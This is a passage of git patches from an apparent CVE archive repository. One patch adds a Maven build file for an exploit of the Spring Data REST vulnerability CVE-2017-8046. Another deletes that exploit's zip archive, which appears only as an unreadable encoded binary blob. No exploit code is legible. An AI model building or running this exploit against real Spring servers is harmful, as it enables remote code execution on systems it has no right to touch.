+  <modelVersion>4.0.0</modelVersion>
+  <groupId>com.afs.exploit</groupId>
+  <artifactId>spring-break_cve-2017-8046</artifactId>
+  <version>1.3</version>
+  <name>spring-break_cve-2017-8046</name>
+  <description>This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).</description>
+  <properties>
+    <maven.compiler.source>1.7</maven.compiler.source>
+    <maven.compiler.target>1.7</maven.compiler.target>
+  </properties>
+  <build>
+    <sourceDirectory>src/main/java</sourceDirectory>
+    <plugins>
+      <plugin>
+        <artifactId>maven-compiler-plugin</artifactId>
+        <version>3.1</version>
+        <configuration>
+          <source/>
+          <target/>
+        </configuration>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-assembly-plugin</artifactId>
+        <executions>
+          <execution>
+            <phase>package</phase>
+            <goals>
+              <goal>single</goal>
+            </goals>
+            <configuration>
+              <archive>
+                <manifest>
+                  <mainClass>com.afs.exploit.spring.SpringBreakCve20178046</mainClass>
+                </manifest>
+              </archive>
+              <descriptorRefs>
+                <descriptorRef>jar-with-dependencies</descriptorRef>
+              </descriptorRefs>
+            </configuration>
+          </execution>
+        </executions>
+      </plugin>
+    </plugins>
+  </build>
+  <dependencies>
+    <dependency>
+      <groupId>org.apache.httpcomponents</groupId>
+      <artifactId>httpclient</artifactId>
+      <version>4.5.5</version>
+    </dependency>
+
+      <!--
+      This dependency is used for file-handling (uploads). But it's a tradeoff. The options are:
+         a) write long and non-elegant filehandling-code manually without libraries and basic java-features
+         b) write readable code, no library, but sacrifice compatibility by using Java-1.7+ file-handling features
+         c) write short code, use this library and be Java-1.5+ compatible.
+      Option C was chosen:
+      -->
+    <dependency>
+      <groupId>commons-io</groupId>
+      <artifactId>commons-io</artifactId>
+      <version>2.6</version>
+    </dependency>
+  </dependencies>
+  <url>https://github.com/m3ssap0/spring-break_cve-2017-8046</url>
+</project>
\ No newline at end of file
-- 
Gitee


From 110b6b3d54f852f23961f8905fef5f20f495e3bf Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:57:17 +0000
Subject: [PATCH 05/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?=
 =?UTF-8?q?e/java-spring/2017/CVE-2017-8046/spring-break=5Fcve-2017-8046-m?=
 =?UTF-8?q?aster.zip?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../spring-break_cve-2017-8046-master.zip       | Bin 12833 -> 0 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip

diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip
deleted file mode 100644
index 078e924350cf580703b34d31477354a894198a3b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 12833
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
